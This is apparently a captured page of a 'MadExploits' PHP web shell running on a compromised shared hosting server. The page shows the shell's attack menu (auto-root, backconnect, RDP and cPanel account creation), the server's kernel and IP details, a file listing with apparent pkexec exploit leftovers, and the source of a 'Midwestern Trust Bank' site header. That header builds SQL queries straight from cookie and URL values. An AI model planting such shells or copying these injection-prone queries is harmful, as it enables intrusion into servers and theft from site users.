Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
5.26
KB
-rw-r--r--
footer.php
2.07
KB
-rw-r--r--
footer2.php
7.72
KB
-rw-r--r--
header.php
3.05
KB
-rw-r--r--
header2.php
1.74
KB
-rw-r--r--
main_content.php
4.86
KB
-rw-r--r--
navbar.php
10.83
KB
-rw-r--r--
navbar2.php
3.95
KB
-rw-r--r--
profile.php
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php session_start(); ?> <?php error_reporting(0); $_SESSION['sess_user'] = $_COOKIE['sess_user']; $_SESSION['sess_user'] = $_SESSION['sess_user']; if($_COOKIE['sess_user']==""){ ?> <script type="text/javascript"> window.location.href = "login.php" </script> <?php //echo "Plss login"; // $_COOKIE['sess_user']= $_SESSION['sess_user'] = "hopeful_user"; } $domain_name="www.midwest-tb.com"; $site_name ="Midwestern Trust Bank"; $site_name2 ="Your Financial status is in good hands"; $webmail="support@midwest-tb.com"; $call="+18123798653"; $site_address =" 4720 Grandview Dr, Logansport, IN 46947"; date_default_timezone_set(); $link = ""; include("db.php"); include("functions.php"); include("functions/mobile_detect.php"); $site =$_SERVER["REQUEST_URI"]; $_SESSION['sess_user'] = $_SESSION['sess_user']; $user = $_SESSION['sess_user']; $base_url = $_SERVER['PHP_SELF']; ?> <!DOCTYPE html> <html> <head> <meta name="theme-color" content="#000000" /> <meta name="google-site-verification" content="" /><meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="assets_dashboard/vendor/chartist/css/chartist.min.css"> <link href="assets_dashboard/vendor/bootstrap-select/dist/css/bootstrap-select.min.css" rel="stylesheet"> <link href="assets_dashboard/vendor/owl-carousel/owl.carousel.css" rel="stylesheet"> <link href="assets_dashboard/css/style.css" rel="stylesheet"> <link rel="stylesheet" href="assets_dashboard/css/font-awesome.css" /> </head> <?php $sql = "SELECT * FROM last_login WHERE owner='$user' "; $run= mysqli_query($con,$sql); while($row= mysqli_fetch_array($run)){ $login_activity = $row['login_activity']; $login_activity2 = $login_activity+1; $login_date = date('D, d-M-Y'); $login_time = date('h:ia'); } $sql2="UPDATE last_login SET login_date ='$login_date', login_time='$login_time', login_activity='$login_activity2' WHERE owner='$user' "; $run2 =mysqli_query($con,$sql2); include("functions/hastag.php"); ?> <?php if(isset($_GET['user'])){ $show = $_GET['user']; $part=explode("@", $show); if($part[1] !=""){ $show = $part[1]; } else{ $show = $_GET['user']; } $sql = mysqli_query($con,"SELECT id FROM users WHERE username ='$show' "); $count = mysqli_num_rows($sql); if($count==0){ header("Location: user_error.php"); } } $time = date('y-m-d'); $current_time = date('y-m-d, h:ia'); $notify_sql = "SELECT id FROM notifications WHERE owner ='$user' && status='unread' "; $notify_run= mysqli_query($con,$notify_sql); $notify_check= mysqli_num_rows($notify_run); $msg_sql = "SELECT id FROM messages WHERE recipient ='$user' && status='unread' "; $msg_run= mysqli_query($con,$msg_sql); $msg_check= mysqli_num_rows($msg_run); ?> <?php $get_help ="WITHDRAW"; $pay_help="MAKE DONATION"; ?>
Close